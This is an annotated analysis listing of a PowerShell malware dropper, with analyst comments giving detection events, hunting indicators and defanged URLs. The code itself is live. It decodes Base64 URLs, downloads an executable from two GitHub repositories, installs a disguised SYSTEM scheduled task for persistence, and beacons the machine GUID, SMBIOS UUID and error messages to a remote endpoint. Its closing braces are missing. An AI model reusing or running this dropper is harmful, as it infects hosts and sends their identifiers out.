# Analyst note: reads one value from HKEY_LOCAL_MACHINE and returns it as a string.
#   keyPath   - subkey path under HKLM.
#   valueName - name of the value to read.
#   view      - 32- or 64-bit registry view; defaults to RegistryView.Default.
# Returns "" when the subkey is missing, the value is missing, or any exception is thrown,
# so the caller cannot tell "absent" from "access denied".
# NOTE(review): the closing ')' of param and the closing '}' of try/catch/function are not
# present in this listing; they appear to have been lost when the sample was extracted.
function Get-RegistryValue {
param (
[string]$keyPath,
[string]$valueName,
[Microsoft.Win32.RegistryView]$view = [Microsoft.Win32.RegistryView]::Default
try {
# Open HKLM through the requested view so a 32-bit host can still read the 64-bit hive.
$baseKey = [Microsoft.Win32.RegistryKey]::OpenBaseKey([Microsoft.Win32.RegistryHive]::LocalMachine, $view)
$subKey = $baseKey.OpenSubKey($keyPath)
if ($subKey) {
$value = $subKey.GetValue($valueName)
if ($null -eq $value) {
return ""
}
return $value.ToString()
}
else {
return ""
}
catch {
# Every failure is swallowed silently; nothing is logged locally.
return ""
# Analyst note: downloads $url to the file $path with Invoke-WebRequest.
# Returns $true when the call completes and $false when an exception is caught.
# The downloaded content is written to disk as-is; no hash, signature or size check is performed.
# Detection: a PowerShell process issuing Invoke-WebRequest with -OutFile to an .exe path
# shows up in script-block logging (event ID 4104) and in process/network telemetry.
# NOTE(review): closing delimiters for param/try/catch/function are missing from this listing.
function gf {
param (
[string]$url,
[string]$path
try {
Invoke-WebRequest -Uri $url -OutFile $path -UseBasicParsing
return $true
catch {
return $false
# Analyst note: string de-obfuscation helper. Base64-decodes $i and interprets the bytes as
# UTF-16LE ([System.Text.Encoding]::Unicode). The script uses it to keep its URLs out of
# plain text, so a static string search for "http" will not match this file; decode the
# Base64 literals passed to this function when triaging.
# NOTE(review): the closing '}' of the function is missing from this listing.
function fbsf() {
param ([string]$i)
return [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($i));
# Analyst note: persistence routine. Registers a scheduled task that runs the executable
# at $pPath and then asks the Task Scheduler to start it.
#   pPath - executable the task action launches.
#   tName - task name.
#   tPath - task folder.
# Properties of the task, useful for hunting:
#   - principal is SYSTEM with RunLevel Highest, so registration requires an elevated caller;
#   - two triggers: at system startup, and once 5 minutes after registration repeating every hour;
#   - settings allow it to start and keep running on battery power;
#   - -Force overwrites any existing task with the same name and path.
# Detection: task creation is recorded as Security event 4698 (when object-access auditing is
# enabled) and in the TaskScheduler/Operational log.
# NOTE(review): closing delimiters for param and the function are missing from this listing.
function cst {
param (
[string] $pPath,
[string] $tName,
[string] $tPath
$actionNode = New-ScheduledTaskAction -Execute "$pPath"
$hourlyTrigger = New-ScheduledTaskTrigger -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Hours 1) -Once
$startupTrigger = New-ScheduledTaskTrigger -AtStartup
$principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries
$task = New-ScheduledTask -Action $actionNode -Principal $principal -Trigger $hourlyTrigger, $startupTrigger -Settings $settings
Register-ScheduledTask -TaskName "$tName" -InputObject $task -TaskPath "$tPath" -Force
Start-ScheduledTask -TaskName "$tPath\$tName"
# Analyst note: host fingerprinting and configuration for the dropper.
# Pick the registry view that matches the OS bitness reported by WMI.
# NOTE(review): closing '}' characters for this if/else are missing from the listing.
if ((Get-WmiObject -Class Win32_ComputerSystem).SystemType -match 'x64') {
$RegView = [Microsoft.Win32.RegistryView]::Registry64
else {
$RegView = [Microsoft.Win32.RegistryView]::Registry32
# Two stable host identifiers are collected: the Windows MachineGuid and the SMBIOS product UUID.
# Both are later sent in the query string of the script's outbound requests.
$machine_id = Get-RegistryValue -keyPath "SOFTWARE\Microsoft\Cryptography" -valueName "MachineGuid" -view $RegView
$uuid = (Get-CimInstance -ClassName Win32_ComputerSystemProduct).UUID
# Indicators: the task is placed under the \Microsoft\Windows\ task folder tree with a
# system-sounding name. "Perfomance" is misspelled in both strings, which makes an exact-match
# hunt on the task path/name practical.
$tPath = "\Microsoft\Windows\Performance\Network Perfomance"
$tName = "Network Perfomance"
# Indicators: payload directory and file name. LOCALAPPDATA resolves per the account that runs
# the script, so the absolute path differs between a user session and SYSTEM.
$pDir = "$env:LOCALAPPDATA\Microsoft\Performance"
$pPath = "$env:LOCALAPPDATA\Microsoft\Performance\NTService.exe"
# Reporting endpoint, stored as Base64 of UTF-16LE text. Decoded and defanged for blocklists:
#   hxxps://stats[.]app-gain[.]com/e?
$_lru = fbsf("aAB0AHQAcABzADoALwAvAHMAdABhAHQAcwAuAGEAcABwAC0AZwBhAGkAbgAuAGMAbwBtAC8AZQA/AA==")
if (-Not (Test-Path -Path $pDir)) {
New-Item -Path $pDir -ItemType Directory -Force
}
# Analyst note: main flow - fetch the payload if it is absent, install persistence, report status.
# Payload sources, stored as Base64 of UTF-16LE text. Decoded and defanged:
#   hxxps://raw[.]githubusercontent[.]com/pleaser124d/rest22/main/NTService.exe
#   hxxps://raw[.]githubusercontent[.]com/hobbaboga/foot821/main/NTService.exe
# Hosting on a widely allowed content domain means a domain-level block is unlikely to be
# usable; match on the full repository path instead.
$lrus = @()
$lrus += fbsf("aAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBwAGwAZQBhAHMAZQByADEAMgA0AGQALwByAGUAcwB0ADIAMgAvAG0AYQBpAG4ALwBOAFQAUwBlAHIAdgBpAGMAZQAuAGUAeABlAA==")
$lrus += fbsf("aAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBoAG8AYgBiAGEAYgBvAGcAYQAvAGYAbwBvAHQAOAAyADEALwBtAGEAaQBuAC8ATgBUAFMAZQByAHYAaQBjAGUALgBlAHgAZQA=")
# Payload not on disk: try each source in order and stop at the first successful download,
# then register the scheduled task for it.
if (-Not (Test-Path -Path $pPath)) {
foreach ($lru in $lrus) {
if (gf -url $lru -path $pPath) {
cst -pPath $pPath -tName $tName -tPath $tPath
break
}
}
# Status report: HTTP GET to the base URL in $_lru with machine_id, uuid, event=install and
# source=peer in the query string. These parameter names are usable as a proxy/IDS signature.
# NOTE(review): the '}' that closes the Test-Path branch is missing from the listing, so it is
# not certain from here whether this request and exit run only on the fresh-install path.
Invoke-RestMethod -Uri "$($_lru)machine_id=$machine_id&uuid=$uuid&event=install&source=peer" -Method Get
exit(0)
# Payload present but the task is gone: re-register persistence and report again. A responder
# who deletes only the task will see it return if this script runs again.
$task = Get-ScheduledTask -TaskName $tName -ErrorAction SilentlyContinue
if (-Not ($task)) {
cst -pPath $pPath -tName $tName -tPath $tPath
Invoke-RestMethod -Uri "$($_lru)machine_id=$machine_id&uuid=$uuid&event=install&source=peer" -Method Get
exit(0)
# NOTE(review): no matching 'try {' is visible for this catch; presumably the opener was lost
# along with the other delimiters.
# On failure, the URL-encoded exception message is sent to the same endpoint with event=error,
# so local error text leaves the host together with the two host identifiers.
catch {
Add-Type -AssemblyName System.Web
$message = [System.Web.HttpUtility]::UrlEncode($_.Exception.Message)
Invoke-RestMethod -Uri "$($_lru)machine_id=$machine_id&uuid=$uuid&event=error&source=peer&message=$message" -Method Get